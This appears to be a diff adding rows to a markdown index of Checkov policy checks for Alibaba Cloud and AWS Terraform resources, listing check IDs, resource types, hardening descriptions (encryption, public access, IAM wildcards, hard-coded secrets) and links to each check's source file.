+|   39 | CKV_ALI_41      | resource | alicloud_mongodb_instance                               | Ensure MongoDB is deployed inside a VPC                                                                                                                                                                  | Terraform | [MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py)                                                                                          |
+|   40 | CKV_ALI_42      | resource | alicloud_mongodb_instance                               | Ensure Mongodb instance uses SSL                                                                                                                                                                         | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py)                                                                                      |
+|   41 | CKV_ALI_43      | resource | alicloud_mongodb_instance                               | Ensure MongoDB instance is not public                                                                                                                                                                    | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py)                                                                                            |
+|   42 | CKV_ALI_44      | resource | alicloud_mongodb_instance                               | Ensure MongoDB has Transparent Data Encryption Enabled                                                                                                                                                   | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py)                                            |
+|   43 | CKV_AWS_1       | data     | aws_iam_policy_document                                 | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py)                                                                                             |
+|   44 | CKV_AWS_2       | resource | aws_alb_listener                                        | Ensure ALB protocol is HTTPS                                                                                                                                                                             | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py)                                                                                               |
+|   45 | CKV_AWS_2       | resource | aws_lb_listener                                         | Ensure ALB protocol is HTTPS                                                                                                                                                                             | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py)                                                                                               |
+|   46 | CKV_AWS_3       | resource | aws_ebs_volume                                          | Ensure all data stored in the EBS is securely encrypted                                                                                                                                                  | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py)                                                                                                     |
+|   47 | CKV_AWS_5       | resource | aws_elasticsearch_domain                                | Ensure all data stored in the Elasticsearch is securely encrypted at rest                                                                                                                                | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py)                                                                                 |
+|   48 | CKV_AWS_5       | resource | aws_opensearch_domain                                   | Ensure all data stored in the Elasticsearch is securely encrypted at rest                                                                                                                                | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py)                                                                                 |
+|   49 | CKV_AWS_6       | resource | aws_elasticsearch_domain                                | Ensure all Elasticsearch has node-to-node encryption enabled                                                                                                                                             | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py)                                                             |
+|   50 | CKV_AWS_6       | resource | aws_opensearch_domain                                   | Ensure all Elasticsearch has node-to-node encryption enabled                                                                                                                                             | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py)                                                             |
+|   51 | CKV_AWS_7       | resource | aws_kms_key                                             | Ensure rotation for customer created CMKs is enabled                                                                                                                                                     | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py)                                                                                                         |
+|   52 | CKV_AWS_8       | resource | aws_instance                                            | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted                                                                                                | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py)                                                               |
+|   53 | CKV_AWS_8       | resource | aws_launch_configuration                                | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted                                                                                                | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py)                                                               |
+|   54 | CKV_AWS_9       | resource | aws_iam_account_password_policy                         | Ensure IAM password policy expires passwords within 90 days or less                                                                                                                                      | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py)                                                                               |
+|   55 | CKV_AWS_10      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy requires minimum length of 14 or greater                                                                                                                                      | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py)                                                                                       |
+|   56 | CKV_AWS_11      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy requires at least one lowercase letter                                                                                                                                        | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py)                                                                     |
+|   57 | CKV_AWS_12      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy requires at least one number                                                                                                                                                  | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py)                                                                                       |
+|   58 | CKV_AWS_13      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy prevents password reuse                                                                                                                                                       | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py)                                                                                         |
+|   59 | CKV_AWS_14      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy requires at least one symbol                                                                                                                                                  | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py)                                                                                       |
+|   60 | CKV_AWS_15      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy requires at least one uppercase letter                                                                                                                                        | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py)                                                                     |
+|   61 | CKV_AWS_16      | resource | aws_db_instance                                         | Ensure all data stored in the RDS is securely encrypted at rest                                                                                                                                          | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py)                                                                                                     |
+|   62 | CKV_AWS_17      | resource | aws_db_instance                                         | Ensure all data stored in RDS is not publicly accessible                                                                                                                                                 | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py)                                                                                     |
+|   63 | CKV_AWS_17      | resource | aws_rds_cluster_instance                                | Ensure all data stored in RDS is not publicly accessible                                                                                                                                                 | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py)                                                                                     |
+|   64 | CKV_AWS_18      | resource | aws_s3_bucket                                           | Ensure the S3 bucket has access logging enabled                                                                                                                                                          | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml)                                                                                         |
+|   65 | CKV_AWS_19      | resource | aws_s3_bucket                                           | Ensure all data stored in the S3 bucket is securely encrypted at rest                                                                                                                                    | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml)                                                                                   |
+|   66 | CKV_AWS_19      | resource | aws_s3_bucket_server_side_encryption_configuration      | Ensure all data stored in the S3 bucket is securely encrypted at rest                                                                                                                                    | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml)                                                                                   |
+|   67 | CKV_AWS_20      | resource | aws_s3_bucket                                           | S3 Bucket has an ACL defined which allows public READ access.                                                                                                                                            | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml)                                                                                         |
+|   68 | CKV_AWS_20      | resource | aws_s3_bucket_acl                                       | S3 Bucket has an ACL defined which allows public READ access.                                                                                                                                            | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml)                                                                                         |
+|   69 | CKV_AWS_21      | resource | aws_s3_bucket                                           | Ensure all data stored in the S3 bucket have versioning enabled                                                                                                                                          | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml)                                                                                   |
+|   70 | CKV_AWS_21      | resource | aws_s3_bucket_versioning                                | Ensure all data stored in the S3 bucket have versioning enabled                                                                                                                                          | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml)                                                                                   |
+|   71 | CKV_AWS_22      | resource | aws_sagemaker_notebook_instance                         | Ensure SageMaker Notebook is encrypted at rest using KMS CMK                                                                                                                                             | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py)                                                                         |
+|   72 | CKV_AWS_23      | resource | aws_db_security_group                                   | Ensure every security group and rule has a description                                                                                                                                                   | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|   73 | CKV_AWS_23      | resource | aws_elasticache_security_group                          | Ensure every security group and rule has a description                                                                                                                                                   | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|   74 | CKV_AWS_23      | resource | aws_redshift_security_group                             | Ensure every security group and rule has a description                                                                                                                                                   | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|   75 | CKV_AWS_23      | resource | aws_security_group                                      | Ensure every security group and rule has a description                                                                                                                                                   | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|   76 | CKV_AWS_23      | resource | aws_security_group_rule                                 | Ensure every security group and rule has a description                                                                                                                                                   | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|   77 | CKV_AWS_23      | resource | aws_vpc_security_group_egress_rule                      | Ensure every security group and rule has a description                                                                                                                                                   | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|   78 | CKV_AWS_23      | resource | aws_vpc_security_group_ingress_rule                     | Ensure every security group and rule has a description                                                                                                                                                   | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|   79 | CKV_AWS_24      | resource | aws_security_group                                      | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                           |
+|   80 | CKV_AWS_24      | resource | aws_security_group_rule                                 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                           |
+|   81 | CKV_AWS_24      | resource | aws_vpc_security_group_ingress_rule                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                           |
+|   82 | CKV_AWS_25      | resource | aws_security_group                                      | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                                       |
+|   83 | CKV_AWS_25      | resource | aws_security_group_rule                                 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                                       |
+|   84 | CKV_AWS_25      | resource | aws_vpc_security_group_ingress_rule                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                                       |
+|   85 | CKV_AWS_26      | resource | aws_sns_topic                                           | Ensure all data stored in the SNS topic is encrypted                                                                                                                                                     | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py)                                                                                           |
+|   86 | CKV_AWS_27      | resource | aws_sqs_queue                                           | Ensure all data stored in the SQS queue is encrypted                                                                                                                                                     | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py)                                                                                           |
+|   87 | CKV_AWS_28      | resource | aws_dynamodb_table                                      | Ensure DynamoDB point in time recovery (backup) is enabled                                                                                                                                               | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py)                                                                                               |
+|   88 | CKV_AWS_29      | resource | aws_elasticache_replication_group                       | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest                                                                                                                | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py)                                         |
+|   89 | CKV_AWS_30      | resource | aws_elasticache_replication_group                       | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit                                                                                                             | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py)                                   |
+|   90 | CKV_AWS_31      | resource | aws_elasticache_replication_group                       | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token                                                                                          | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py)                 |
+|   91 | CKV_AWS_32      | resource | aws_ecr_repository_policy                               | Ensure ECR policy is not set to public                                                                                                                                                                   | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py)                                                                                                             |
+|   92 | CKV_AWS_33      | resource | aws_kms_key                                             | Ensure KMS key policy does not contain wildcard (*) principal                                                                                                                                            | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py)                                                                                 |
+|   93 | CKV_AWS_34      | resource | aws_cloudfront_distribution                             | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS                                                                                                                                      | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py)                                                               |
+|   94 | CKV_AWS_35      | resource | aws_cloudtrail                                          | Ensure CloudTrail logs are encrypted at rest using KMS CMKs                                                                                                                                              | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py)                                                                         |
+|   95 | CKV_AWS_36      | resource | aws_cloudtrail                                          | Ensure CloudTrail log file validation is enabled                                                                                                                                                         | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py)                                                                                 |
+|   96 | CKV_AWS_37      | resource | aws_eks_cluster                                         | Ensure Amazon EKS control plane logging is enabled for all log types                                                                                                                                     | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py)                                                                                   |
+|   97 | CKV_AWS_38      | resource | aws_eks_cluster                                         | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0                                                                                                                                            | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py)                                                                                         |
+|   98 | CKV_AWS_39      | resource | aws_eks_cluster                                         | Ensure Amazon EKS public endpoint disabled                                                                                                                                                               | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py)                                                                                                 |
+|   99 | CKV_AWS_40      | resource | aws_iam_policy_attachment                               | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                                 |
+|  100 | CKV_AWS_40      | resource | aws_iam_user_policy                                     | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                                 |
+|  101 | CKV_AWS_40      | resource | aws_iam_user_policy_attachment                          | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                                 |
+|  102 | CKV_AWS_41      | provider | aws                                                     | Ensure no hard coded AWS access key and secret key exists in provider                                                                                                                                    | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py)                                                                                                         |
+|  103 | CKV_AWS_42      | resource | aws_efs_file_system                                     | Ensure EFS is securely encrypted                                                                                                                                                                         | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py)                                                                                       |
+|  104 | CKV_AWS_43      | resource | aws_kinesis_stream                                      | Ensure Kinesis Stream is securely encrypted                                                                                                                                                              | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py)                                                                         |
+|  105 | CKV_AWS_44      | resource | aws_neptune_cluster                                     | Ensure Neptune storage is securely encrypted                                                                                                                                                             | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py)                                                                   |
+|  106 | CKV_AWS_45      | resource | aws_lambda_function                                     | Ensure no hard-coded secrets exist in lambda environment                                                                                                                                                 | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py)                                                                       |
+|  107 | CKV_AWS_46      | resource | aws_instance                                            | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                                   |
+|  108 | CKV_AWS_46      | resource | aws_launch_configuration                                | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                                   |
+|  109 | CKV_AWS_46      | resource | aws_launch_template                                     | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                                   |
+|  110 | CKV_AWS_47      | resource | aws_dax_cluster                                         | Ensure DAX is encrypted at rest (default is unencrypted)                                                                                                                                                 | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py)                                                                                                     |
+|  111 | CKV_AWS_48      | resource | aws_mq_broker                                           | Ensure MQ Broker logging is enabled                                                                                                                                                                      | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py)                                                                                                 |
+|  112 | CKV_AWS_49      | data     | aws_iam_policy_document                                 | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py)                                                                                   |
+|  113 | CKV_AWS_50      | resource | aws_lambda_function                                     | X-Ray tracing is enabled for Lambda                                                                                                                                                                      | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py)                                                                                             |
+|  114 | CKV_AWS_51      | resource | aws_ecr_repository                                      | Ensure ECR Image Tags are immutable                                                                                                                                                                      | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py)                                                                                               |
+|  115 | CKV_AWS_53      | resource | aws_s3_bucket_public_access_block                       | Ensure S3 bucket has block public ACLS enabled                                                                                                                                                           | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py)                                                                                             |
+|  116 | CKV_AWS_54      | resource | aws_s3_bucket_public_access_block                       | Ensure S3 bucket has block public policy enabled                                                                                                                                                         | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py)                                                                                         |
+|  117 | CKV_AWS_55      | resource | aws_s3_bucket_public_access_block                       | Ensure S3 bucket has ignore public ACLs enabled                                                                                                                                                          | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py)                                                                                           |
+|  118 | CKV_AWS_56      | resource | aws_s3_bucket_public_access_block                       | Ensure S3 bucket has 'restrict_public_buckets' enabled                                                                                                                                                   | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py)                                                                                 |
+|  119 | CKV_AWS_57      | resource | aws_s3_bucket                                           | S3 Bucket has an ACL defined which allows public WRITE access.                                                                                                                                           | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml)                                                                                       |
+|  120 | CKV_AWS_57      | resource | aws_s3_bucket_acl                                       | S3 Bucket has an ACL defined which allows public WRITE access.                                                                                                                                           | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml)                                                                                       |
+|  121 | CKV_AWS_58      | resource | aws_eks_cluster                                         | Ensure EKS Cluster has Secrets Encryption Enabled                                                                                                                                                        | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py)                                                                                       |
+|  122 | CKV_AWS_59      | resource | aws_api_gateway_method                                  | Ensure there is no open access to back-end resources through API                                                                                                                                         | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py)                                                                                 |
+|  123 | CKV_AWS_60      | resource | aws_iam_role                                            | Ensure IAM role allows only specific services or principals to assume it                                                                                                                                 | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py)                                                                             |
+|  124 | CKV_AWS_61      | resource | aws_iam_role                                            | Ensure AWS IAM policy does not allow assume role permission across all services                                                                                                                          | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py)                                                                     |
+|  125 | CKV_AWS_62      | resource | aws_iam_group_policy                                    | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                                   |
+|  126 | CKV_AWS_62      | resource | aws_iam_policy                                          | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                                   |
+|  127 | CKV_AWS_62      | resource | aws_iam_role_policy                                     | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                                   |
+|  128 | CKV_AWS_62      | resource | aws_iam_user_policy                                     | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                                   |
+|  129 | CKV_AWS_62      | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                                   |
+|  130 | CKV_AWS_63      | resource | aws_iam_group_policy                                    | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                         |
+|  131 | CKV_AWS_63      | resource | aws_iam_policy                                          | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                         |
+|  132 | CKV_AWS_63      | resource | aws_iam_role_policy                                     | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                         |
+|  133 | CKV_AWS_63      | resource | aws_iam_user_policy                                     | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                         |
+|  134 | CKV_AWS_63      | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                         |
+|  135 | CKV_AWS_64      | resource | aws_redshift_cluster                                    | Ensure all data stored in the Redshift cluster is securely encrypted at rest                                                                                                                             | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py)                                                                             |
